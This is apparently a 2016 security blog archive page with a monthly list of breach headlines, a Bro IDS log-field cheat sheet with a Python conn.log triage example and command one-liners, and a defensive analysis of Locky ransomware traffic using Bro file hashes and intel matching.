Monthly Archives: July 2016

List of data breaches and cyber attacks in July 2016 – 35,400,000 known records stolen

Another month is coming to a close, and once again it ends with a long list of data breaches and cyber attacks – a list that gets longer every month.

Two breaches that stand out to me are the Wendy’s and Cici’s Pizza data breaches, in which point-of-sale (POS) malware swiped a significant amount of card details. POS malware is an increasingly serious issue for retailers – there are many variations and many ways for the malware to be installed. There haven’t been any official numbers to show how many cards were affected in either breach, but more than 1000 Wendy’s and 135 Cici’s locations were affected.

Data breach

StarCare Specialty Health System notifies patients after burglar snatches laptop, paper files

O2 customer data sold on dark net

King’s counselling department breaches students’ privacy

Athens Orthopedic Clinic to begin notifying patients of hack

WikiLeaks Put Women in Turkey in Danger, for No Reason

10 million customers’ data leaked from online shopping site

‘Warframe’ Hacked, Details on 775,000 Players Traded

Illinois online voter registration portal hacked, information compromised

Wolverhampton council in huge data leak blunder

Wikileaks posts nearly 20,000 hacked DNC emails online

Glassdoor goof exposes thousands of user email addresses

Sunbury Plaza Dental notifies patients after stored records were burglarized

Hacker steals 1.6 million accounts from top mobile game’s forum

WeWork battling another data leak

Denmark sent sensitive health data to Chinese by mistake

Beggars Group Hacked, Warns Customers of Data Breach

Saint John Development Corporation finds cyber attack damage

Confidential Info of 388 HIV Patients Feared Leaked in China

Asiana Airlines Website Has Customers’ Personal Data Leak

Notice of Ubuntu Forums breach; user passwords not compromised

Alabama website breach revealed personal data of some state retirees

Leaky database leaves Oklahoma police, bank vulnerable to intruders

Stolen laptop puts Pa. taxpayers’ data at risk

Hospital Hackers Steal Thousands of Newborn Baby Videos

Datadog chews on data breach, AWS user credentials in leak

Ukrainian Hacker Hacks Polish Telecom Giant Netia; Leaks Massive Data

Hackers Allegedly Steal 1.4M Passwords From Mac Forums, Web Hosting Talk

Internet Bot Exposes 20 Million MTN Irancell Users’ Data

Cyber attack

Hackers target Hunting & Fishing NZ

Pink Hill pastor says computer hacked, churchgoer information almost compromised

US Congress websites recovering after three-day DDoS attack

Steemit experienced hack, theft of user funds, and DDoS attack

LizardStresser recruits an army of zombie webcams to launch DDoS attacks

Internet in Mumbai Goes Slow As ISPs Suffer Massive DDoS Attacks

HSBC Website Suffers DDoS Attack

Financial

DID Electrical says more than 300 people have card details stolen after online security breach

Cici’s Pizza suffers payment card data breach

Omni Hotels & Resorts data breach affects 50,000 credit and debit cards

Over 1000 Wendy’s restaurants hacked – customers’ credit card details stolen

Other

O2 customer data sold on dark net

Lasair Aesthetic Health notifying patients after manager took information after resigning

Kaiser Permanente notifies patients after stolen ultrasound machines were recovered

Playstation chief Shuhei Yoshida has his Twitter hacked by OurMine

Fighting back against cyber crime

Hongkonger who launched over 6,000 web attacks during Occupy movement gets 15 months probation

UK Security Firm Execs Admit to Hacking Rival Company

Fired after NFL player’s medical chart leaked to ESPN, worker sues

Loan Company Employee Sentenced for Stolen Identity Tax Fraud

Baseball Hacking Case Ends with Prison


Cyber Security Attack Pie Graph: SQL Injection / XSS leading the way – DDoS attacks swept under the rug

Cyber Security Attack Pie Graph – you can see SQLi is still #1; however, most XSS attacks are never even realized. Additionally, DDoS attacks might actually be the most common attack worldwide, but many of them are short bursts that go unnoticed. Other DDoS attacks go unreported out of fear that disclosure will hurt the victim’s brand and reputation.

Figure: WHID top web hacking methods (pie chart)


Bro Logs Cheat Sheet: protocol log fields and descriptions


conn.log: conn_state
State Meaning
S0 Connection attempt seen, no reply
S1 Connection established, not terminated (0 byte counts)
SF Normal establish & termination (>0 byte counts)
REJ Connection attempt rejected
S2 Established, ORIG attempts close, no reply from RESP.
S3 Established, RESP attempts close, no reply from ORIG.
RSTO Established, ORIG aborted (RST)
RSTR Established, RESP aborted (RST)
RSTOS0 ORIG sent SYN then RST; no RESP SYN-ACK
RSTRH RESP sent SYN-ACK then RST; no ORIG SYN
SH ORIG sent SYN then FIN; no RESP SYN-ACK (“half-open”)
SHR RESP sent SYN-ACK then FIN; no ORIG SYN
OTH No SYN, not closed. Midstream traffic. Partial connection.
capture_loss.log (Estimate of packet loss)
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
peer string Name of the Bro instance reporting loss
gaps count ACKs seen without seeing data being ACKed
acks count Total number of TCP ACKs
percent_loss string gaps/acks, as a percentage. Estimate of loss.
dns.log (DNS query/response details)
Field Type Description
ts time Timestamp of the DNS request
uid string Unique id of the connection
id record ID record with orig/resp host/port. See conn.log
proto proto Protocol of DNS transaction – TCP or UDP
trans_id count 16 bit identifier assigned by DNS client; responses match
query string Domain name subject of the query
qclass count Value specifying the query class
qclass_name string Descriptive name of the query class (e.g. C_INTERNET)
qtype count Value specifying the query type
qtype_name string Name of the query type (e.g. A, AAAA, PTR)
rcode count Response code value in the DNS response
rcode_name string Descriptive name of the response code (e.g. NOERROR, NXDOMAIN)
QR bool Was this a query or a response? T = response, F = query
AA bool Authoritative Answer. T = server is authoritative for query
TC bool Truncation. T = message was truncated
RD bool Recursion Desired. T = request recursive lookup of query
RA bool Recursion Available. T = server supports recursive queries
Z count Reserved field, should be zero in all queries & responses
answers vector List of resource descriptions in answer to the query
TTLs vector Caching intervals of the answers
rejected bool Whether the DNS query was rejected by the server
conn.log (IP, TCP, UDP and ICMP connection details)
Field Type Description
ts time Timestamp
uid string Unique ID of Connection
id.orig_h addr Originating endpoint’s IP address (AKA ORIG)
id.orig_p port Originating endpoint’s TCP/UDP port (or ICMP code)
id.resp_h addr Responding endpoint’s IP address (AKA RESP)
id.resp_p port Responding endpoint’s TCP/UDP port (or ICMP code)
proto transport_proto Transport layer protocol of connection
service string Dynamically detected application protocol, if any
duration interval Time of last packet seen – time of first packet seen
orig_bytes count Originator payload bytes; from sequence numbers if TCP
resp_bytes count Responder payload bytes; from sequence numbers if TCP
conn_state string Connection state (see conn.log:conn_state table)
local_orig bool If conn originated locally T; if remotely F. If Site::local_nets empty, always unset.
missed_bytes count Number of missing bytes in content gaps
history string Connection state history (see conn.log:history table)
orig_pkts count Number of ORIG packets
orig_ip_bytes count Number of ORIG IP bytes (via IP total_length header field)
resp_pkts count Number of RESP packets
resp_ip_bytes count Number of RESP IP bytes (via IP total_length header field)
tunnel_parents set If tunneled, connection UID of encapsulating parent(s)
orig_cc string ORIG GeoIP Country Code
resp_cc string RESP GeoIP Country Code
conn.log: history (Orig UPPERCASE, Resp lowercase, uniq-ed)
Letter Meaning
S a SYN without the ACK bit set
H a SYN-ACK (“handshake”)
A a pure ACK
D packet with payload (“data”)
F packet with FIN bit set
R packet with RST bit set
C packet with a bad checksum
I Inconsistent packet (Both SYN & RST)
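The conn_state and history tables are easiest to read when applied to actual records. The following Python is an added example, not part of the cheat sheet: it maps a tab-separated conn.log line onto the field order of the conn.log table (without the optional orig_cc/resp_cc GeoIP columns), splits the history string into originator (uppercase) and responder (lowercase) events, and raises a few review flags a defender typically wants: one-sided connection attempts (S0, REJ, RSTOS0, SH), midstream traffic (OTH) and content gaps reported in missed_bytes. The sample lines, UIDs and RFC 5737 addresses are constructed, not captured traffic.

```python
"""Decode the conn_state and history columns of a Bro conn.log record.

Added example, not part of the cheat sheet. Assumptions: the column order is
the conn.log table without the optional orig_cc/resp_cc GeoIP columns, and the
sample lines are constructed (RFC 5737 documentation addresses, made-up UIDs).
"""

# conn.log column order (Bro 2.3 cheat sheet), GeoIP columns omitted.
CONN_FIELDS = [
    "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
    "proto", "service", "duration", "orig_bytes", "resp_bytes",
    "conn_state", "local_orig", "missed_bytes", "history", "orig_pkts",
    "orig_ip_bytes", "resp_pkts", "resp_ip_bytes", "tunnel_parents",
]

# conn_state values and their meanings, as in the conn_state table.
CONN_STATE = {
    "S0": "Connection attempt seen, no reply",
    "S1": "Connection established, not terminated",
    "SF": "Normal establishment and termination",
    "REJ": "Connection attempt rejected",
    "S2": "Established, ORIG attempts close, no reply from RESP",
    "S3": "Established, RESP attempts close, no reply from ORIG",
    "RSTO": "Established, ORIG aborted (RST)",
    "RSTR": "Established, RESP aborted (RST)",
    "RSTOS0": "ORIG sent SYN then RST; no RESP SYN-ACK",
    "RSTRH": "RESP sent SYN-ACK then RST; no ORIG SYN",
    "SH": "ORIG sent SYN then FIN; no RESP SYN-ACK (half-open)",
    "SHR": "RESP sent SYN-ACK then FIN; no ORIG SYN",
    "OTH": "No SYN, not closed; midstream traffic",
}

# history letters; the case of each letter says who sent it (ORIG upper, RESP lower).
HISTORY_LETTER = {
    "s": "SYN", "h": "SYN-ACK", "a": "ACK", "d": "data", "f": "FIN",
    "r": "RST", "c": "bad checksum", "i": "inconsistent (SYN+RST)",
}


def decode_history(history):
    """Split a history string into what ORIG and RESP did, in order of first occurrence."""
    orig, resp = [], []
    for ch in history:
        name = HISTORY_LETTER.get(ch.lower(), "unknown(" + ch + ")")
        (orig if ch.isupper() else resp).append(name)
    return {"orig": orig, "resp": resp}


def parse_conn_line(line):
    """Map one tab-separated conn.log record onto CONN_FIELDS; '-' (unset) becomes None."""
    values = line.rstrip("\n").split("\t")
    if len(values) != len(CONN_FIELDS):
        raise ValueError("expected %d columns, got %d" % (len(CONN_FIELDS), len(values)))
    return {k: (None if v == "-" else v) for k, v in zip(CONN_FIELDS, values)}


def triage(rec, loss_threshold=10000):
    """Return review flags for one parsed record."""
    flags = []
    state = rec["conn_state"]
    if state in ("S0", "REJ", "RSTOS0", "SH"):
        flags.append("no-handshake:" + state)  # one-sided SYNs: scans, dead hosts, filtered ports
    elif state == "OTH":
        flags.append("midstream")              # capture started after the handshake
    missed = rec["missed_bytes"]
    if missed is not None and int(missed) > loss_threshold:
        flags.append("content-gap")            # analyzers saw holes in the payload stream
    return flags


# Constructed sample records: a normal HTTP fetch, a single unanswered SYN to
# telnet, and a midstream TLS session with a large content gap.
SAMPLE_CONN_LINES = [
    "\t".join(["1467148303.427135", "CxoDpp1Q0001", "192.0.2.100", "49152", "203.0.113.5", "80",
               "tcp", "http", "1.334915", "350", "269106", "SF", "T", "0", "ShADadFf",
               "8", "782", "195", "277306", "(empty)"]),
    "\t".join(["1467148304.000000", "CxoDpp1Q0002", "198.51.100.7", "40000", "192.0.2.10", "23",
               "tcp", "-", "-", "-", "-", "S0", "F", "0", "S", "1", "60", "0", "0", "(empty)"]),
    "\t".join(["1467148305.500000", "CxoDpp1Q0003", "192.0.2.100", "50000", "203.0.113.9", "443",
               "tcp", "ssl", "12.5", "2200", "180000", "OTH", "T", "20480", "DdAa",
               "40", "3800", "130", "165000", "(empty)"]),
]


def triage_all(lines=SAMPLE_CONN_LINES):
    """Return {uid: {state meaning, flags, decoded history}} for each conn.log line."""
    out = {}
    for line in lines:
        rec = parse_conn_line(line)
        out[rec["uid"]] = {
            "state": CONN_STATE.get(rec["conn_state"], "unknown"),
            "flags": triage(rec),
            "history": decode_history(rec["history"] or ""),
        }
    return out


if __name__ == "__main__":
    for uid, info in triage_all().items():
        print(uid, info["state"], info["flags"], info["history"])
```

The 10000-byte threshold in `triage` is the same cut-off the bro-cut/awk one-liner for "high packet loss" uses later on this page; raise or lower it to suit the sensor's capture quality.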
dhcp.log (DHCP lease activity)
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
mac string Client’s hardware address
assigned_ip addr Client’s actual assigned IP address
lease_time interval IP address lease time
trans_id count Identifier assigned by the client; responses match
app_stats.log
Statistics on usage of popular web apps
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
app string Name of application (YouTube, Netflix, etc.)
uniq_hosts count Number of unique hosts that used app
hits count Number of visits to app
bytes count Total bytes transferred to/from app

files.log (File analysis results)
Field Type Description
ts time Timestamp when file was first seen
fuid string Identifier for a single file
tx_hosts set If transferred via network, host(s) that sourced the data
rx_hosts set If transferred via network, host(s) that received the data
conn_uids set Connection UID(s) over which the file was transferred
source string An identification of the source of the file data
depth count Depth of file related to source; e.g. SMTP MIME attachment depth, HTTP depth of the request
analyzers set Set of analysis types done during file analysis
mime_type string Libmagic sniffed file type
filename string If available, filename from source; frequently the “Content-Disposition” headers in network protocols
duration interval The duration the file was analyzed for
local_orig bool If transferred via network, did data originate locally?
is_orig bool If transferred via network, was file sent by the originator?
seen_bytes count Number of bytes provided to file analysis engine
total_bytes count Total number of bytes that should comprise the file
missing_bytes count Number of bytes in the file stream missed; e.g. dropped packets
overflow_bytes count Number of not all-in-sequence bytes in the file stream delivered to file analyzers due to reassembly buffer overflow
timedout bool If the file analysis timed out at least once per file
parent_fuid string ID associated with a container file from which this one was extracted as a part of the analysis
md5/sha1/sha256 string MD5/SHA1/SHA256 hash of file, if enabled
extracted string Local filename of extracted files, if enabled
dnp3.log (Distributed Network Protocol (industrial control))
Field Type Description
ts time Timestamp
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
fc_request string The name of the request function message
fc_reply string The name of the reply function message
iin count Response’s “internal indication number”
irc.log (IRC communication details)
Field Type Description
ts time Timestamp
uid string Unique id
id record ID record with orig/resp host/port. See conn.log
nick string Nickname given for this connection
user string Username given for this connection
command string Command given by the client
value string Value for the command given by the client
addl string Any additional data for the command
dcc_file_name string DCC filename requested
dcc_file_size count Size of the DCC transfer as indicated by the sender
dcc_mime_type string Sniffed mime type of the file
fuid string File unique ID
ftp.log (FTP request/reply details)
Field Type Description
ts time Command timestamp
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
user string Username for current FTP session
password string Password for current FTP session
command string Command issued by the client
arg string Command argument if present
mime_type string Libmagic sniffed file type if there’s a file transfer
file_size count Size of transferred file
reply_code count Reply code from server in response to the command
reply_msg string Reply message from server in response to the command
data_channel record Information about the data channel (orig, resp, is passive)
fuid string File unique ID
intel.log (Hits on indicators from the intel framework)
Field Type Description
ts time Timestamp of hit
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
fuid string The UID for a file associated with this hit, if any
file_mime_type string A mime type if the hit is related to a file
file_desc string Additional context for file, if available
seen.indicator string The intelligence indicator
seen.indicator_type string The type of data the indicator represents
seen.where string Where the data was discovered
sources set Sources which supplied data for this match
http.log (HTTP request/reply details)
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
trans_depth count Pipelined depth into the connection
method string HTTP request verb: GET, POST, HEAD, etc.
host string Value of the HOST header
uri string URI used in the request
referrer string Value of the “referer” header
user_agent string Value of the User-Agent header
request_body_len count Actual uncompressed content size of the data transferred from the client
response_body_len count Actual uncompressed content size of the data transferred from the server
status_code count Status code returned by the server
status_msg string Status message returned by the server
info_code count Last seen 1xx info reply code by server
info_msg string Last seen 1xx info reply message by server
filename string Via the Content-Disposition server header
tags set Indicators of various attributes discovered
username string If basic-auth is performed for the request
password string If basic-auth is performed for the request
proxied set Headers that might indicate a proxied request
orig_fuids vector An ordered vector of file unique IDs from orig
orig_mime_types vector An ordered vector of mime types from orig
resp_fuids vector An ordered vector of file unique IDs from resp
resp_mime_types vector An ordered vector of mime types from resp

known_hosts.log (Observed local active IPs; logged once per day)
Field Type Description
ts time Timestamp first seen
host addr IP address of host
known_services.log (Observed local services; logged once per day)
Field Type Description
ts time Timestamp
host addr Host address on which the service is running
port_num port Port number on which the service is running
port_proto transport_proto Transport-layer protocol service uses
service set Set of protocol(s) that match the service’s connection payloads
notice.log (Logged notices)
Field Type Description
ts time Timestamp
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
fuid string File unique identifier
file_mime_type string Libmagic sniffed file type
file_desc string Additional context for file, if available
proto transport_proto Transport protocol
note string The type of the notice
msg string Human readable message for the notice
sub string Sub-message for the notice
src addr Source address
dst addr Destination address
p port Associated port, if any
n count Associated count or status code
peer_descr string Description for peer that raised this notice
actions set Actions applied to this notice
suppress_for interval Length of time dupes should be suppressed
dropped bool If the src IP was blocked
known_certs.log (Observed local certs; logged once per day)
Field Type Description
ts time Measurement timestamp
host addr Address that offered the certificate
port_num port If server, port that server is listening on
subject string Certificate subject
issuer_subject string Certificate issuer subject
serial string Serial number for the certificate
smtp.log (SMTP transactions)
Field Type Description
ts time Timestamp when the message was first seen
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
trans_depth count Depth of message transaction if multiple messages transferred
helo string Contents of the HELO header
mailfrom string Contents of the MAIL FROM header
rcptto set Contents of the RCPT TO header
date string Contents of the DATE header
from string Contents of the FROM header
to set Contents of the TO header
reply_to string Contents of the ReplyTo header
msg_id string Contents of the MsgID header
in_reply_to string Contents of the In-Reply-To header
subject string Contents of the Subject header
x_originating_ip addr Contents of the X-Originating-IP header
first_received string Contents of the first Received header
second_received string Contents of the second Received header
last_reply string Last message that the server sent to the client
path vector Message transmission path, extracted from the headers
user_agent string Value of the User-Agent header from the client
tls bool Connection has switched to using TLS
fuids vector File unique IDs seen attached to this message
is_webmail bool Indicates if the message was sent through a webmail interface
modbus.log (PLC requests (industrial control))
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
func string Function message that was sent
exception string Exception if there was a failure
reporter.log (Bro internal errors and warnings)
Field Type Description
ts time Message timestamp
level string Message severity (Info, warning, error, etc.)
message string Message text
location string The script location where the event occurred, if available
Version: 2.3
www.CriticalStack.com
radius.log (Radius authentication details)
Field Type Description
ts time Timestamp of the detection
uid string Unique ID for the connection
id conn_id ID record with orig/resp host/port. See conn.log
username string The username, if present
mac string MAC address, if present
remote_ip addr Remote IP address, if present
connect_info string Connect info, if present
result string Successful or failed authentication
logged bool Whether this has already been logged & ignored

ssl.log (SSL handshakes; v2.2 only, v2.3 uses x509.log)
Field Type Description
ts time Timestamp when the SSL connection was detected
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
version string SSL version that the server offered
cipher string SSL cipher suite that the server chose
server_name string Value of the Server Name Indicator SSL extension
session_id string Session ID offered by the client for session resumption
subject string Subject of the X.509 cert offered by the server
issuer_subject string Signer Subject of the cert offered by the server
not_valid_before time NotValidBefore field value from the server cert
not_valid_after time NotValidAfter field value from the server cert
last_alert string Last alert that was seen during the connection
client_subject string Subject of the X.509 cert offered by the client
clnt_issuer_subject string Subject of the signer of the cert offered by the client
cert_hash string MD5 hash of the raw server certificate
validation_status vector Certificate validation for this connection
ssh.log (SSH handshakes)
Field Type Description
ts time Timestamp when the SSH connection was detected
uid string Connection unique ID
id record ID record with orig/resp host/port. See conn.log
status string If the login was heuristically guessed to be a “success” or a “failure”.
direction string Outbound or inbound connection
client string Software string from the client
server string Software string from the server
resp_size count Amount of data returned by the server

socks.log (SOCKS proxy requests)
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
version count Protocol version of SOCKS
user string Username for proxy, if available
status string Server status for the attempt using proxy
request.host addr Client requested address
request.name string Client requested name
request_p port Client requested port
bound.host addr Server bound address
bound.name string Server bound name
bound_p port Server bound port
software.log (Software identified by the software framework)
Field Type Description
ts time Timestamp of the detection
host addr IP address running the software
host_p port Port on which the software is running (for servers)
software_type string Type of software (e.g. HTTP::SERVER)
name string Name of the software
version.major count Major version number of the software
version.minor count Minor version number of the software
version.minor2 count Minor subversion number of the software
version.minor3 count Minor update number of the software
version.addl string Additional version string (e.g. beta42)
unparsed_version string The full, unparsed version of the software
signatures.log (Matches from the signature framework)
Field Type Description
ts time Timestamp of match
src_addr addr Host triggering the signature match event
src_port port Host port on which the match occurred
dst_addr addr Host which was sent the matching payload
dst_port port Port which was sent the matching payload
note string Notice associated with the signature event
sig_id string Name of the signature that matched
event_msg string More descriptive message of the event
sub_msg string Extracted payload data or extra message
sig_count count Number of sigs
host_count count Number of hosts
snmp.log (SNMP communication)
Field Type Description
ts time Timestamp tunnel was detected
uid string Connection unique id
id conn_id ID record with orig/resp host/port. See conn.log
duration interval Amount of time between first/latest packet in session
version string The version of SNMP being used
community string Community string of the first SNMP packet associated w/ session; v1 & v2c only
get_requests count Number of variable bindings in GetRequest/Next
get_bulk_requests count Number of variable bindings in GetBulkRequest PDU
get_responses count Number of variable bindings in GetResponse/Response PDUs
set_requests count Number of variable bindings in SetRequest PDUs
display_string string System description of the SNMP responder endpoint
up_since time Time the SNMP responder claims it has been up since
stderr.log / stdout.log (Error / output logging; controlled by LogAscii::output_to_stdout = F &redef)
syslog.log (Syslog messages)
Field Type Description
ts time Timestamp when the message was seen
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
proto transport_proto Protocol over which message was seen. Only UDP is currently supported.
facility string Syslog facility for the message
severity string Syslog severity for the message
message string The plain text syslog message

Index
Log Description
app_stats Statistics on usage of popular web apps
capture_loss Estimate of packet loss
cluster Diagnostics for cluster operation
communication Diagnostics for inter-process communications
conn IP, TCP, UDP and ICMP connection details
dhcp DHCP lease activity
dnp3 Distributed Network Protocol (industrial control)
dpd Diagnostics for dynamic protocol detection
files File analysis results
intel Hits on indicators from the intel framework
irc IRC communication details
known_certs Observed local SSL certs. Each is logged once/day
known_devices Observed local devices. Each is logged once/day
known_hosts Observed local active IPs. Each is logged once/day
known_services Observed local services. Each is logged once/day
loaded_scripts A list of scripts that were loaded at startup
modbus PLC requests (industrial control)
notice Logged notices
packet_filter Any filters to limit the traffic being analyzed
radius Radius authentication details
reporter Internal errors and warnings
signatures Matches from the signatures framework
socks SOCKS proxy requests
software Software identified by the software framework
ssh SSH handshakes
ssl SSL handshakes (v2.2 only; v2.3 uses x509.log)
stats Diagnostics such as mem usage, packets seen, etc.
stderr / stdout Output logging
traceroute Hosts running traceroute
tunnel Details of encapsulating tunnels
x509 x509 Certificate Analyzer Output
weird Anomalies and protocol violations
x509.log (x509 Certificate Analyzer Output)
Field Type Description
ts time Timestamp of the detection
id string File id of this certificate
certificate record Certificate details
certificate.version count Version number
certificate.serial string Serial number
certificate.issuer string Certificate issuer
certificate.not_valid_before time Timestamp before which certificate is not valid
certificate.not_valid_after time Timestamp after which certificate is not valid
certificate.key_alg string Name of the key algorithm
certificate.sig_alg string Name of the signature algorithm
certificate.key_type string Key type, if key parseable by openssl (rsa, dsa or ec)
certificate.key_length count Key length in bits
certificate.exponent string Exponent, if RSA certificate
certificate.curve string Curve, if EC certificate
san record Subject Alternative Name
san.dns string_vec List of DNS entries in the SAN
san.uri string_vec List of URI entries in the SAN
san.email string_vec List of email entries in the SAN
san.ip addr_vec List of IP entries in the SAN
san.other_fields bool True if certificate contained other, unrecognized fields
basicconstraints record Basic constraints extension of the certificate
basicconstraints.ca bool CA flag set?
basicconstraints.path_len count Maximum path length
logcert bool T (present if policy/protocols/ssl/log-hostcerts-only.bro is loaded)
weird.log (Anomalies and protocol violations)
Field Type Description
ts time Timestamp of message
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
name string The name of the weird that occurred
addl string Additional information accompanying the weird, if any
notice bool Indicate if this weird was also turned into a notice
peer string The peer that generated this weird
traceroute.log (Hosts running traceroute)
Field Type Description
ts time Timestamp traceroute was detected
src addr Address initiating the traceroute
dst addr Destination address of the traceroute
proto string Protocol used for the traceroute
tunnel.log (Details of encapsulating tunnels)
Field Type Description
ts time Timestamp tunnel was detected
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
tunnel_type string The type of tunnel (e.g. Teredo, IP)
action string The activity that occurred (discovered, closed)

bro one liners

bro -C -r file.pcap local extract-all-files.bro "Site::local_nets += {10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16}"
Hey bro, ignore checksums (-C) and then read in file.pcap (-r) using the current local.bro, also load extract-all-files.bro, and ADD the following subnets to your list of local_nets.

less conn.log | bro-cut -d | awk '{split($0, a, "\t"); if (a[5] == "10.2.2.2") print $0}'
First print out conn.log and send the output to bro-cut; bro-cut replaces the unix epoch time column with a human readable date (-d) and sends the output to awk; awk chops each line at every tab and puts the columns into an array a; if the fifth element, a[5], is "10.2.2.2", it prints the whole log line.

bro -C -r http-partial-content-transfer.pcap policy/misc/dump-events.bro "PacketFilter::default_capture_filter = \"host 54.230.103.187\"" >> dump-events-host.log
Hey bro, read in this pcap and also load dump-events.bro, running with a BPF so you only look at traffic to and from this host, and then append the output to this file.

cat conn.log | bro-cut id.orig_h id.resp_h orig_bytes resp_bytes missed_bytes | awk '$5 > 10000'
Let's look for connections with high packet loss (more than 10000 missed bytes).

Linux Commands

Getting Around
Command – Description
cd logs – Move to the logs directory, which is located in the current directory.
cd /logs – Move to the logs directory, which is located in the top-level directory.
cd .. – Move up one directory.
cd ~ – Move to your home directory (“tilde” is to the left of the 1 key).
cd - – Move to the directory you were previously in.

Viewing and searching files
Command – Description
cat conn.log – Display conn.log
cat *.log – Display all files that end in .log
head conn.log – Display the first 10 lines of conn.log
head -n 20 conn.log – Display the first 20 lines of conn.log
tail conn.log – Display the last 10 lines of conn.log
tail -n 30 conn.log – Display the last 30 lines of conn.log
tail -F conn.log – Display the last 10 lines and keep showing new lines as they arrive. Note: Ctrl+C to exit
grep SSL notice.log – Display lines in notice.log that contain SSL
grep -v SSL notice.log – Display lines in notice.log without SSL
grep 'mal ware' data.txt – Search for an item with spaces using single quotes.
grep -F 1.2.3.4 – Search for phrases with periods (fixed string, not a regular expression)
grep -c dosexec files.log – How many lines in files.log contain dosexec
less conn.log – Display conn.log in less (see “Navigating in less”)
less -S conn.log – Display with side-to-side scrolling

Navigating in less
Command – Description
q – Quit
up/down arrow – Move up/down one line
left/right arrow – Move left/right ½ page; requires less -S
page up/down – Move up/down one page
g – Go to the first line
G – Go to the last line
F – Go to the last line; display any new lines. Ctrl-C to exit
/SSL – Search: go to the next line containing ‘SSL’
/!SSL – Search: go to the next line NOT containing ‘SSL’
?malware – Search: go to the previous line containing ‘malware’
n – Repeat a previous search
N – Repeat a previous search in the opposite direction

Putting it all together
Command – Description
| aka “pipe” – Pass the output of one command to another command.
grep SSL notice.log | tail -n 30 – Display the last 30 lines in notice.log that contain “SSL”.
grep SSL notice.log | grep -i google – Display lines in notice.log containing SSL and google in any case (upper/lower mix).
cat data.txt | sort – Display data.txt, sorted alphabetically.
cat data.txt | sort | uniq – Display data.txt, sorted alphabetically, with duplicates removed.
cat data.txt | sort | uniq -c – Display data.txt, sorted alphabetically, with duplicates removed and a count of each occurrence.
cat data.txt | sort | uniq -c | sort -n – Display, sort, count of distinct, ordered from least to most
cat notice.log | bro-cut note | sort | uniq -c | sort -n – What are the most popular notices?
cat http.log | bro-cut -d ts method host uri – Only display timestamp, method, host and URI and convert timestamp to human readable.

git commands
Command – Description
git clone [url] – Downloads a project and the entire version history
git status – Lists all new or modified files to be committed
git diff – Shows file differences not yet staged
git add [file] – Snapshots the file in preparation for versioning
git diff --staged – Shows file differences between staging & last version.
git reset [file] – Unstages the file and preserves contents
git commit – Records snapshot; add -m "msg" for comment
git branch – Show all branches in current repo; -a for all branches
git branch [name] – Create a new branch
git checkout [branch] – Switches to the specified branch & updates the working directory.
git merge [branch] – Combines the specified branch’s history into the current branch.


Bro vs Snort IDS: Locky Ransomware Traffic Sample (tcpdump) Packet Analysis

(PCAP and Binary samples available with their usual password and location)

Bro and Snort are completely different types of applications, although they are commonly compared against one another. From a network security standpoint, Snort can’t do much to detect new malware variants, obfuscation TTPs and other non-low-hanging fruit for which we haven’t created a signature.

Bro gives us the ability to detect malware as close to 0-day as we could hope for with a few simple tricks. Once you have enabled all Bro logging options, you will have SHA1 and MD5 hashes for the files and certificates traversing your network. Bro by itself is nothing more than a logging interface, but it can easily be turned into an IDS. Anti-virus software depends upon signatures, heuristics and patterns that have been fed to it for detection; this type of detection is far from real time, but for most of us it is as good as it gets.

When I submitted the Locky ransomware sample (https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/) for a scan it had a detection rate of 4/50, with only Trend Micro AV actually detecting it as Locky (by now most of the AV suites detect it). We can use Bro as an enhanced anti-virus suite by leveraging every major vendor's intel at once. Samples are submitted all over the Internet, at different rates and to different vendors, and almost all of the vendors publish RSS feeds and search-indexed pages that update almost instantly. A simple Python script that pulls the major vendors' feeds with cURL and indexes the file hashes and other indicators of compromise gives us the collective knowledge of all of them without a paid subscription to any. Run it from a cron job every 5, 10, 30 or 60 minutes, whatever suits your client's or site's needs, and match the result against the hashes, IPs and domain names that Bro logs from your network. If you write the indicators out in the tab-separated intel.dat layout (indicator, indicator_type, meta.source), Bro's own Intel framework (frameworks/intel/seen plus an Intel::read_files entry) does the matching inline and writes hits to intel.log; frameworks/files/detect-MHR, also loaded by the default local.bro, already checks every SHA1 against Team Cymru's Malware Hash Registry.

Here are the Bro logs for the Locky sample. SHA256: 84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5. Analysis links:

https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/
https://malwr.com/analysis/NTIwNjc0Zjc1NWJlNDUwOTg5NTA2OWQ3ZTZkZmFkZWQ/
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ASMW/detailed-analysis.aspx#

root@computersecurity:/var/log/bro/2016-06-28# zcat files.17\:00\:00-18\:00\:00.log.gz | grep application/x-dos
1467148303.427135       FEQjwH1zOtgq0XUwd       217.74.66.167   192.168.1.100 ChxVZM3W6tGn0jM9ad      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.334915        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –
1467148303.428111       F3ZsZV32sDWqH6jLFj      217.74.66.167   192.168.1.100   CDKmDc28png4js7QY1      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.338627        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –

